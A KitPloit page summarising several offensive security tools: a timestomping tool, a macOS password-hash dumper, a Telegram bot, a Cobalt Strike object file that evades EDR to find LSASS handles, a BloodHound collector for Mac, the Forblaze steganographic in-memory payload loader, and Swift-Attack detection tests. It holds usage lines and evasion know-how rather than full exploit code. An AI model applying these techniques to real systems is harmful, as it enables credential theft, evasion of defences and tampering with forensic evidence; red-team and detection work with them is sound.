<p>KitPloit - PenTest & Hacking Tools: leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security (feed updated 2024-03-19)</p><h1>Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp</h1><p>Published 2024-01-31</p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjGwlVXosv8tPSN6WLhyGjxgcf5CIjlQNhtsx3vEfrgwo7kcxiyjS3JuLyYAaF_NX-jzO5qARKDOdnziTr7LEYVXO1Fqvcvvgh_UOpMrpoai2Ad3fehvpjqMMSaJJkOg7-iJdnBfNrFoxM-vo4Qyxmg4yVutAFTXJXjSkL4ba-es5ZESHAE72ifLkY1nF56"><img alt="" border="0" height="102" id="BLOGGER_PHOTO_ID_7310072158277616962" src="https://blogger.googleusercontent.com/img/a/AVvXsEjGwlVXosv8tPSN6WLhyGjxgcf5CIjlQNhtsx3vEfrgwo7kcxiyjS3JuLyYAaF_NX-jzO5qARKDOdnziTr7LEYVXO1Fqvcvvgh_UOpMrpoai2Ad3fehvpjqMMSaJJkOg7-iJdnBfNrFoxM-vo4Qyxmg4yVutAFTXJXjSkL4ba-es5ZESHAE72ifLkY1nF56=w640-h102" width="640" /></a></p><br /> <p dir="auto">A PowerShell function to perform timestomping on specified files and directories. 
The function can modify timestamps recursively for all files in a directory.</p> <ul dir="auto"> <li>Change timestamps for individual files or directories.</li> <li>Recursively apply timestamps to all files in a directory.</li> <li>Option to use specific credentials for remote paths or privileged files.</li> </ul> <p dir="auto">I've ported Stompy to C#, Python and Go; the relevant versions are linked in this repo, each with its own readme.</p> <ul dir="auto"> <li><a href="https://github.com/ZephrFish/Stompy/tree/main/StompySharps" rel="nofollow" target="_blank" title="C# version">C# version</a></li> <li><a href="https://github.com/ZephrFish/Stompy/tree/main/StomPY" rel="nofollow" target="_blank" title="Python">Python</a></li> <li><a href="https://github.com/ZephrFish/Stompy/tree/main/GoStompy" rel="nofollow" target="_blank" title="Go">Go</a></li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <ul dir="auto"> <li><code>-Path</code>: The path to the file or directory whose timestamps you wish to modify.</li> <li><code>-NewTimestamp</code>: The new DateTime value you wish to set for the file or directory.</li> <li><code>-Credentials</code>: (Optional) If you need to specify a different user's credentials.</li> <li><code>-Recurse</code>: (Switch) If specified, apply the timestamp recursively to all files in the given directory.</li> </ul> <h2 dir="auto" tabindex="-1">Usage Examples</h2> <p dir="auto">Specify the <code>-Recurse</code> switch to apply timestamps recursively:</p> <ol dir="auto"> <li>Change the timestamp of an individual file:</li> </ol> <div><pre><code>Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 
AM"</code></pre></div> <ol dir="auto" start="2"> <li>Recursively change timestamps for all files in a directory:</li> </ol> <div><pre><code>Invoke-Stompy -Path "C:\path\to\directory" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse</code></pre></div> <ol dir="auto" start="3"> <li>Use specific credentials:</li> </ol> <p dir="auto">Demo:</p> <p dir="auto" style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi5DNraOX8EbEmhcOjjuIZmOvGY36PQMULK-R7WS33GNDSlrXpW-oNwTnjS6Zrya6oLfQjmzAZBp8viHC6H0BK2Qyx6_gpFn4oD3GCbDjjhAyUbpk8_zU4AO_P38E8QwYMi8Yp7q0oPRZ9z_6eELWWqg-AKR1qQqRWdMN5RUFTXDCWpv9dRpDLOoeOhEx1k"><img alt="" border="0" height="44" id="BLOGGER_PHOTO_ID_7310072184883724114" src="https://blogger.googleusercontent.com/img/a/AVvXsEi5DNraOX8EbEmhcOjjuIZmOvGY36PQMULK-R7WS33GNDSlrXpW-oNwTnjS6Zrya6oLfQjmzAZBp8viHC6H0BK2Qyx6_gpFn4oD3GCbDjjhAyUbpk8_zU4AO_P38E8QwYMi8Yp7q0oPRZ9z_6eELWWqg-AKR1qQqRWdMN5RUFTXDCWpv9dRpDLOoeOhEx1k=w640-h44" width="640" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ZephrFish/Stompy" rel="nofollow" target="_blank" title="Download Stompy">Download Stompy</a></span></b></div><h1>Osx-Password-Dumper - A Tool To Dump Users' .Plist On A Mac OS System And To Convert Them Into A Crackable Hash</h1><p>Published 2023-12-13</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQs_8qRTpoldjWjs33Qrxziw9fDii990RF6rMB1Va3K1bNHDxfblXo0q46dBNg6ApEsftEbFGnfhue8r5U9DZrMFw8spHOI9yHUH9uJcCNF_vx7Ry35RLixdm1TSF7YmXevdeRkSVInrYNKsM-QaKpUQJSD0BECtxiVPs9fIMVhEo1rMmra1ZsdN9JQvEd/s1792/Osx-Password-Dumper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQs_8qRTpoldjWjs33Qrxziw9fDii990RF6rMB1Va3K1bNHDxfblXo0q46dBNg6ApEsftEbFGnfhue8r5U9DZrMFw8spHOI9yHUH9uJcCNF_vx7Ry35RLixdm1TSF7YmXevdeRkSVInrYNKsM-QaKpUQJSD0BECtxiVPs9fIMVhEo1rMmra1ZsdN9JQvEd/w640-h366/Osx-Password-Dumper.png" width="640" /></a></div><p><br /></p><h1 dir="auto" tabindex="-1">OSX Password Dumper Script</h1> <h2 dir="auto" tabindex="-1">Overview</h2> <p dir="auto">A bash script to retrieve users' .plist files on a macOS system and convert the data inside them into a crackable hash format (for use with John the Ripper or Hashcat).</p> <p dir="auto">Useful for CTFs/Pentesting/Red Teaming on macOS systems.</p> <h2 dir="auto" tabindex="-1">Prerequisites</h2> <ul dir="auto"> <li>The script must be run as a root user (<code>sudo</code>)</li> <li>macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JeanPeyreMesMots/osx-password-dumper" rel="nofollow" target="_blank" title="Download Osx-Password-Dumper">Download Osx-Password-Dumper</a></span></b></div><h1>PowerGram - Multiplatform Telegram Bot In Pure PowerShell</h1><p>Published 2022-06-01</p><p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB"><img alt="" border="0" 
height="400" id="BLOGGER_PHOTO_ID_7103840857639290338" src="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB=w640-h400" width="640" /></a></p> <p dir="auto"><strong>PowerGram</strong> is a pure PowerShell Telegram Bot that can be run on Windows, Linux or Mac OS. To make use of it, you only need PowerShell 4 or higher and an internet connection.</p> <p dir="auto">All communication between the Bot and the Telegram servers is encrypted with HTTPS, but all requests are sent with the GET method, so their parameters could easily be intercepted.</p> <h1 dir="auto">Requirements</h1> <ul dir="auto"> <li>PowerShell 4.0 or greater</li> </ul> <h1 dir="auto">Download</h1> <p dir="auto">It is recommended to clone the complete repository or download the zip file. 
You can do this by running the following command:</p> <div><pre><code>git clone https://github.com/JoelGMSec/PowerGram</code></pre></div> <h1 dir="auto">Usage</h1> <div><pre><code>.\PowerGram -h

 ------------------- by @JoelGMSec -------------------

 Info: PowerGram is a pure PowerShell Telegram Bot
       that can be run on Windows, Linux or Mac OS

 Usage: PowerGram from PowerShell
        .\PowerGram.ps1 -h      Show this help message
        .\PowerGram.ps1 -run    Start PowerGram Bot

        PowerGram from Telegram
        /getid                  Get your Chat ID from Bot
        /help                   Show all available commands

 Warning: All commands will be sent using HTTPS GET requests
          You need your Chat ID & Bot Token to run PowerGram
</code></pre></div> <h3 dir="auto">The detailed guide of use can be found at the following link:</h3> <p dir="auto"><a href="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell" rel="nofollow" target="_blank" title="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell">https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell</a></p> <h1 dir="auto">License</h1> <p dir="auto">This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.</p> <h1 dir="auto">Credits and Acknowledgments</h1> <p dir="auto">This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec</p> <h1 dir="auto">Contact</h1> <p dir="auto">This software does not offer any kind of guarantee. 
Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p dir="auto">For more information, you can find me on Twitter as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/PowerGram" rel="nofollow" target="_blank" title="Download PowerGram">Download PowerGram</a></span></b></div><h1>FindObjects-BOF - A Cobalt Strike Beacon Object File (BOF) Project Which Uses Direct System Calls To Enumerate Processes For Specific Loaded Modules Or Process Handles</h1><p>Published 2021-07-07</p><div style="text-align: center;"><a href="http://1.bp.blogspot.com/-OOZR209Jz84/YNkP2SrwTmI/AAAAAAAAeqY/LYN79sEKYR4JkJD7KGv5J7a61KjlAQtHgCK4BGAYYCw/s1600/FindObjects-BOF_1_FindObjects-700101.png"><img alt="" border="0" height="348" id="BLOGGER_PHOTO_ID_6978626522990005858" src="http://1.bp.blogspot.com/-OOZR209Jz84/YNkP2SrwTmI/AAAAAAAAeqY/LYN79sEKYR4JkJD7KGv5J7a61KjlAQtHgCK4BGAYYCw/w640-h348/FindObjects-BOF_1_FindObjects-700101.png" width="640" /></a></div><br /> <p>A Cobalt Strike Beacon Object File (BOF) project which uses <a href="https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" rel="nofollow" target="_blank" title="direct system calls">direct 
system calls</a> to enumerate processes for specific modules or process handles.</p><br /><span style="font-size: large;"><b>What is this repository for?</b></span><br /> <ul> <li>Use direct system calls within Beacon Object Files to enumerate processes for specific loaded modules (e.g. winhttp.dll, amsi.dll or clr.dll).</li> <li>Use direct system calls within Beacon Object Files to enumerate processes for specific process handles (e.g. lsass.exe).</li> <li>Avoid using the Windows and Native APIs as much as possible (to avoid userland hooks).</li> <li>Execute this code within the beacon process using <a href="https://www.cobaltstrike.com/help-beacon-object-files" rel="nofollow" target="_blank" title="Beacon object files">Beacon Object Files</a> to avoid fork&run.</li> </ul> <br /><span style="font-size: large;"><b>Why do I need this?</b></span><br /> <p>Utilizing <a href="https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/" rel="nofollow" target="_blank" title="direct systems calls via inline">direct system calls via inline assembly</a> in BOF code provides a more opsec-safe way of interacting with the system. Using direct system calls avoids AV/EDR software intercepting user-mode API calls.</p> <ul> <li> <p>The <code>FindModule</code> BOF can be used to identify processes which have a certain module loaded, for example the .NET runtime <code>clr.dll</code> or the <code>winhttp.dll</code> module. 
This information can be used to select a more opsec-safe spawnto candidate when using Cobalt Strike's <code>execute-assembly</code> or before injecting an exfil beacon shellcode using the <code>shinject</code> command.</p> </li> <li> <p>The <code>FindProcHandle</code> BOF can be used to identify processes with a specific process handle in use, for example processes holding a handle to the <code>lsass.exe</code> process. If there's a process within the system with an <code>lsass.exe</code> process handle, we could use this existing process/handle to read or write memory without opening a new process handle. This bypasses certain AV/EDR capabilities for detecting and blocking LSASS process/memory access.</p> <p style="text-align: center;"><a href="http://3.bp.blogspot.com/-HoWr_06DQJ0/YNkP4FDXFEI/AAAAAAAAeqo/gEDukpNxbp8HrkUZfC3dWy77WV4_pCYwgCK4BGAYYCw/s1600/FindObjects-BOF_2_FindProcHandle-706958.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6978626553690657858" src="http://3.bp.blogspot.com/-HoWr_06DQJ0/YNkP4FDXFEI/AAAAAAAAeqo/gEDukpNxbp8HrkUZfC3dWy77WV4_pCYwgCK4BGAYYCw/s320/FindObjects-BOF_2_FindProcHandle-706958.png" /></a></p> </li> </ul> <br /><span style="font-size: large;"><b>How do I set this up?</b></span><br /> <p>We will not supply compiled binaries. You will have to do this yourself:</p> <ul> <li>Clone this repository.</li> <li>Make sure you have the Mingw-w64 compiler installed. On Mac OSX, for example, you can use the ports collection to install Mingw-w64 (<code>sudo port install mingw-w64</code>).</li> <li>Run the <code>make</code> command to compile the Beacon Object File.</li> <li>Within Cobalt Strike use the <code>Script Manager</code> to load the <strong>FindObjects.cna</strong> script.</li> <li>Within a Cobalt Strike beacon context use the <code>FindProcHandle</code> or <code>FindModule</code> command with the required parameters (e.g. 
module or process name).</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/outflanknl/FindObjects-BOF" rel="nofollow" target="_blank" title="Download FindObjects-BOF">Download FindObjects-BOF</a></span></b></div><h1>MacHound - An extension to audit Bloodhound collecting and ingesting of Active Directory relationships on MacOS hosts</h1><p>Published 2021-07-03</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-kznhb4h6IhU/YN5jzaUo0UI/AAAAAAAAfjo/xjEEeEq1O-YSz0ssS37DYgwVOLcQNi91gCNcBGAsYHQ/s400/bloodhound.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="400" src="https://1.bp.blogspot.com/-kznhb4h6IhU/YN5jzaUo0UI/AAAAAAAAfjo/xjEEeEq1O-YSz0ssS37DYgwVOLcQNi91gCNcBGAsYHQ/s16000/bloodhound.png" /></a></div><p><br /></p> <p>MacHound is an extension to the Bloodhound auditing tool that allows collecting and ingesting Active Directory relationships on MacOS hosts. MacHound collects information about logged-in users and administrative group members on Mac machines and ingests the information into the Bloodhound database. 
In addition to using the HasSession and AdminTo edges, MacHound adds three new edges to the Bloodhound database:</p> <ul> <li>CanSSH - entity allowed to SSH to host</li> <li>CanVNC - entity allowed to VNC to host</li> <li>CanAE - entity allowed to execute AppleEvent scripts on host</li> </ul> <p>To read more about MacHound, refer to the <a href="https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6" rel="nofollow" target="_blank" title="introduction post">introduction post</a>.</p><br /><span style="font-size: x-large;"><b>Data Collection</b></span><br /> <br /><span style="font-size: large;"><b>Logged-in users (HasSession)</b></span><br /> <p>MacHound uses the utmpx API to query currently active users, and the OpenDirectory and membership APIs to validate Active Directory users.</p> <br /><span style="font-size: large;"><b>Administrative Groups</b></span><br /> <p>MacHound collects Active Directory members of the following local administrative groups:</p> <br /><b>admin</b><br /> <p>The local administrative group, allowing for root operations.</p> <br /><b>com.apple.access_ssh</b><br /> <p>Members of this local group are allowed to access the remote login service (SSH).</p> <br /><b>com.apple.remote_ae</b><br /> <p>Members of this local group are allowed to remotely execute AppleEvent scripts.</p> <br /><b>com.apple.access_screensharing</b><br /> <p>Members of this local group are allowed to access the screen sharing service (VNC).</p> <br /><span style="font-size: x-large;"><b>Components</b></span><br /> <p>MacHound is split into two main components: the collector and the ingestor.</p> <br /><b>Collector</b><br /> <p>The MacHound collector is a Python 3.7 script that runs locally on Active Directory joined MacOS hosts. The collector queries the local OpenDirectory and Active Directory for information about privileged users and groups. 
The output of the execution is a JSON file that contains all the collected information.</p> <br /><b>Ingestor</b><br /> <p>The MacHound ingestor is a Python 3.7 script that parses the output JSON files (one per host), connects to the neo4j database and inserts the edges into the database. The ingestor uses the neo4j library for Python to query information to and from the neo4j database. The ingestor must be executed on a host that has TCP access to the neo4j database.</p> <br /><span style="font-size: x-large;"><b>Getting Started</b></span><br /> <br /><span style="font-size: large;"><b>Requirements</b></span><br /> <p>MacHound requires Python 3.7. The ingestor requires the neo4j library for Python 3.7.</p> <br /><span style="font-size: large;"><b>Collector</b></span><br /> <br /><b>Deployment</b><br /> <p>The Collector should be deployed and executed locally on Macs. The output is stored locally and needs to be transferred to the host running the ingestor. The collector depends on built-in libraries in Python 3.7 and does not require additional installations. MacHound can be compiled as an Application using the py2app library to ease the deployment.</p> <br /><b>Usage</b><br /> <p>The Collector takes no arguments; by default it queries all information and writes the output file to ./output.json. 
The Collector must be executed as a root user.</p> <div><pre><code>collector.py -o <output_file> -c <Admin,CanSSH,CanVNC,CanAE,HasSession> [-v] [-l log_file_path]</code></pre></div> <br /><span style="font-size: large;"><b>Ingestor</b></span><br /> <p>The Ingestor should be deployed on a host that has a direct TCP connection to Bloodhound's neo4j database, preferably locally on the neo4j database server to avoid security risks. The ingestor requires the installation of the neo4j driver for Python (see requirements file).</p> <div><pre><code>ingestor.py <url_to_neo4j> -u <username> -p <password> -i <json_folder></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/XMCyber/MacHound" rel="nofollow" target="_blank" title="Download MacHound">Download MacHound</a></span></b></div><h1>Forblaze - A Python Mac Steganography Payload Generator</h1><p>Published 2021-06-30</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dD9M-8L7iCk/YNEsjCqJ-qI/AAAAAAAAdjs/9WDKNMiP2L8vCnuXu14BLe5rxmz7aV8CgCNcBGAsYHQ/s875/Forblaze.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="875" height="214" 
src="https://1.bp.blogspot.com/-dD9M-8L7iCk/YNEsjCqJ-qI/AAAAAAAAdjs/9WDKNMiP2L8vCnuXu14BLe5rxmz7aV8CgCNcBGAsYHQ/w640-h214/Forblaze.png" width="640" /></a></div><p><br /></p> <p>Forblaze is a project designed to provide steganography capabilities to Mac OS payloads. Using Python 3, it will build an Obj-C file for you which will be compiled to pull desired encrypted URLs out of the stego file, fetch payloads over https, and execute them directly in memory. It utilizes custom encryption - it is not cryptographically secure, but purely meant to thwart analysis by AV engines. It is a slight deviation on my previously built custom encryption for Windows, called Rubicon, and is simpler in practice. Forblaze utilizes header and footer bytes to identify where in the stego file your encrypted bytes are, and then decrypts them with a hard-coded key in compile_forblaze.m. This key can be saved and re-used, with the effect that a different URL could be used to fetch a different payload, and the same compiled forblaze should still be able to execute and process it (provided the header and footer bytes aren't changed, and the new stego file is uploaded to the correct location).</p><br /><span style="font-size: large;"><b>Requirements:</b></span><br /> <p>Python 3 (only tested with Python 3.9+), and some associated Python libraries - pip3 should take care of any Python dependencies you need. 
In addition, clang will be used for compilation, and forblaze should be run on a Mac so that it can be correctly compiled.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <div><pre><code>usage: forblaze_url.py [-h] [-innocent_path PATH] [-o OUTPUT] [-len_key LENGTH_OF_KEY] [-compile_file COMPILE_FILE] [-url_to_encrypt URL] [-supply_key SUPPLIED_KEY] [-stego_location STEGO_LOCATION] [-compiled_binary COMPILED_BINARY]

Generate stego for implants.

optional arguments:
  -h, --help                        show this help message and exit
  -innocent_path PATH               Provide the full path to the innocent file to be used.
  -o OUTPUT                         Provide the path where you want your stego file to be placed.
  -len_key LENGTH_OF_KEY            Provide a positive integer that will be the length of the key in bytes. Default is 16. Must be between 10 and 150 bytes. You can change this yourself, just be wary that larger key sizes will add bloat to your payload and are not necessarily going to make your encryption stronger
  -compile_file COMPILE_FILE        Provide the path to the C++ file you want to edit.
  -url_to_encrypt URL               Provide the URL you want to stick inside the compile file.
  -supply_key SUPPLIED_KEY          If you wish to use a specific key, provide it here. It must be in the format: -supply_key "\x6e\x60\x..." - aka two double slashes are needed between each byte, or else it WILL NOT WORK.
  -stego_location STEGO_LOCATION    You must provide a location on target where the stego file will reside. It is wise to follow strict full paths: /Users/<>/Documents/file.jpg for example.
  -compiled_binary COMPILED_BINARY  Give the name of the compiled binary to extract the URL and run code in memory from the stego file. The default is forblaze.
</code></pre></div> <br /><span style="font-size: large;"><b>Opsec Concerns</b></span><br /> <p>Honestly, not too many. Mac OS detections are still pretty poor, especially for in-memory activity. 
However, as a warning, this method (based almost entirely on <a href="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory" rel="nofollow" target="_blank" title="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory">https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory</a>) will NOT WORK FOR GO COMPILED MACHOS. Every other macho I've tested works fine, so if you really want to use Go C2s such as Mythic, I recommend crafting a custom macho which can function similar to osascript, and call a jxa payload in memory directly. As an exercise for the reader, you could also call payload bytes directly vs a URL with some slight modifications to this code.</p> <p>I would recommend changing things like the number of random bytes generated from the default, and changing the default header and footer bytes that forblaze uses to find the payload in the stego file (as well as the length of those header and footer bytes), to perhaps be more inconspicuous.</p> <br /><span style="font-size: large;"><b>Detection/Prevention</b></span><br /> <p>Steganography is pretty difficult to detect. If you know where the stego file is, you can begin to extract the suspect bytes after the normal file's EOF marker (so after "FFD9" for JPEGs, for example). These suspect bytes will still include the actual encrypted payload and nonsense random bytes, which would be hard to distinguish from each other unless you possess the header and trailing bytes specified by Forblaze. You could look through these bytes for patterns of repeating bytes, since this is how the header and footer bytes with forblaze tend to work, but a skilled operator could make that more difficult to find than the default. 
If a payload is caught, you could obviously reverse-engineer the binary and try to locate the stego file, and then try to use the hard-coded key and headers/footers to reverse the URL being called (or other bytes). But that all assumes you found the binary by some other means.</p> <br /><span style="font-size: large;"><b>Testing</b></span><br /> <p>This tool has been tested on various versions of Mac OS, including Big Sur and Catalina (x64 systems). Please let me know if you have problems.</p> <br /><span style="font-size: large;"><b>Technical Nitty Gritty</b></span><br /> <p>The custom encryption is a basic Caesar cipher, where different bytes of the key are used to shift the bytes of your plaintext. This is why larger keys aren't NECESSARILY better for your encryption - it depends on the length of your plaintext. If your plaintext is 50 bytes and you use a 150 byte key, only the first 50 bytes of your key will be used. If your plaintext is > 150 bytes, however, the longer keys would be more secure.</p> <p>The steganography is quite simple: the bytes of your original innocent file are kept the same, and random bytes (along with your encrypted payload bytes) are appended after these bytes. These random bytes are by default anywhere between 2 and 2000 in length (this should likely be changed to fit your plaintext size: larger plaintexts should mean more random bytes are generated).</p> <p>The in-memory execution piece exactly follows <a href="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory" rel="nofollow" target="_blank" title="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory">https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory</a>, with the simple change that instead of reading payload bytes from an on-disk file, they are read over http/https. 
Later I may add a technique which would allow you to execute Go compiled binaries (there are other sources out there which can also help with this), but for this default version Go compiled binaries will not work. This is because for some strange reason Go compiled machos do not utilize LC_MAIN like most machos do in the load commands of the image (if someone knows why, I am all ears).</p> <br /><span style="font-size: large;"><b>Contributions/Comments/Criticisms</b></span><br /> <p>I am very open to receiving comments and to collaboration! Hopefully this helps generate useful discussion around the topic of custom crypto, or provides researchers some new insights.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/asaurusrex/Forblaze" rel="nofollow" target="_blank" title="Download Forblaze">Download Forblaze</a></span></b></div><br /><br /><span style="font-size: x-large;"><b>Swift-Attack - Unit Tests For Blue Teams To Aid With Building Detections For Some Common macOS Post Exploitation Methods</b></span><br />Published 2021-06-22<br /><p><a href="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png" style="text-align: center;"><img alt="" border="0" height="206" id="BLOGGER_PHOTO_ID_6976305494077282786" src="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/w640-h206/Swift-Attack_1_swiftattack-792260.png" width="640" /></a></p><br /> <p>Unit tests for <a href="https://www.kitploit.com/search/label/Blue%20Teams" target="_blank" title="blue teams">blue teams</a> to aid with building detections for some common macOS <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> methods. 
I have included some post <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> examples using both <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a> and on disk binaries (which should be easier for detection) as well as post exploitation examples using API calls only (which will be more difficult for detection). The post exploitation examples included here are not all encompassing. Instead these are just some common examples that I thought would be useful to conduct unit tests around. I plan to continue to add to this project over time with additional unit tests.</p> <p>All of these tests run locally and return results to stdout (i.e., Swift-Attack does not connect to a server).</p><div><br /></div><span style="font-size: large;"><b>Steps:</b></span><br /> <blockquote> <p>git clone <a href="https://github.com/cedowens/Swift-Attack" rel="nofollow" target="_blank" title="https://github.com/cedowens/Swift-Attack">https://github.com/cedowens/Swift-Attack</a></p> </blockquote> <ul> <li> <p>Ensure you have installed Swift and the developer tools (can be installed from the Mac App Store)</p> </li> <li> <p>Open the xcodeproj file in Xcode</p> </li> <li> <p>Build in Xcode</p> </li> <li> <p>The compiled app will be dropped to something like: <em><strong>Users//Library/Developer/Xcode/DerivedData/Swift-Attack-[random]/Build/Products/Debug/Swift-Attack.app</strong></em></p> </li> <li> <p>cd to the directory above</p> </li> <li> <p>cd Swift-Attack.app/Contents/MacOS (you can run the macho from here or copy it elsewhere and run...up to you)</p> </li> <li> <p>Grant the Swift-Attack macho full disk access to ensure you can run all of the tests without TCC issues</p> </li> <li> <p>Run the following to remove any quarantine 
attributes:</p> </li> </ul> <blockquote> <p>xattr -c Swift-Attack</p> </blockquote> <ul> <li>Run Swift-Attack:</li> </ul> <blockquote> <p>./Swift-Attack -h</p> </blockquote> <p style="text-align: center;"><a href="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png"><img alt="" border="0" height="206" id="BLOGGER_PHOTO_ID_6976305494077282786" src="http://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/w640-h206/Swift-Attack_1_swiftattack-792260.png" width="640" /></a></p> <br /><span style="font-size: large;"><b>Usage:</b></span><br /> <p>You can run Swift-Attack with a single option or multiple options</p> <blockquote> <p>./Swift-Attack [option1] [option2]...</p> </blockquote> <ul> <li> <p>I also included a simple macro.txt file (unobfuscated) for testing parent-child relationships around office macro executions on macOS. I did not obfuscate it since the focus is on parent-child relationship visibility/detection. If you want to test with an obfuscated macro, I have a repo at github.com/cedowens/MacC2 that contains an obfuscated macro.</p> </li> <li> <p>I also did not include any persistence items, since in my opinion it is best to just clone and test persistence using Leo Pitt's persistent JXA repo <a href="https://github.com/D00MFist/PersistentJXA" rel="nofollow" target="_blank" title="https://github.com/D00MFist/PersistentJXA">https://github.com/D00MFist/PersistentJXA</a>. 
This repo is by far the most comprehensive and current repo that I know of for macOS persistence.</p> </li> <li> <p>I recently ported some of the PersistentJXA repos over to Swift: <a href="https://github.com/cedowens/Persistent-Swift" rel="nofollow" target="_blank" title="https://github.com/cedowens/Persistent-Swift">https://github.com/cedowens/Persistent-Swift</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Unit Tests Included:</b></span><br /> <ul> <li> <p>Prompt using osascript binary</p> </li> <li> <p>Prompt via API calls</p> </li> <li> <p>Clipboard dump using osascript binary</p> </li> <li> <p>Clipboard dump using API calls</p> </li> <li> <p>Screenshot using screencapture binary</p> </li> <li> <p>Screenshot using API calls</p> </li> <li> <p>Shell commands</p> </li> <li> <p>Dumping zsh history</p> </li> <li> <p>Security tool enumeration</p> </li> <li> <p>Grabbing system info using osascript binary</p> </li> <li> <p>Grabbing system info via API calls</p> </li> <li> <p>Dumping ssh, aws, gcp, and azure keys on disk</p> </li> <li> <p>Dumping browser history (Chrome, Safari, Firefox)</p> </li> <li> <p>Dumping Quarantine history</p> </li> <li> <p>Office Macro: I included a simple office macro that connects to local host. Note: the macro will invoke curl to make a GET request using python to <a href="http://127.0.0.1/testing" rel="nofollow" target="_blank" title="http://127.0.0.1/testing">http://127.0.0.1/testing</a> when executed by clicking the "Enable Macros" button. This will allow you to test detections for parent-child relationships around macro execution. Note: this simple test does not include any obfuscation, since the test is really more geared towards parent-child relationships. You can use another repo of mine at <a href="https://github.com/cedowens/MacC2" rel="nofollow" target="_blank" title="https://github.com/cedowens/MacC2">https://github.com/cedowens/MacC2</a> to test with obfuscated macros. 
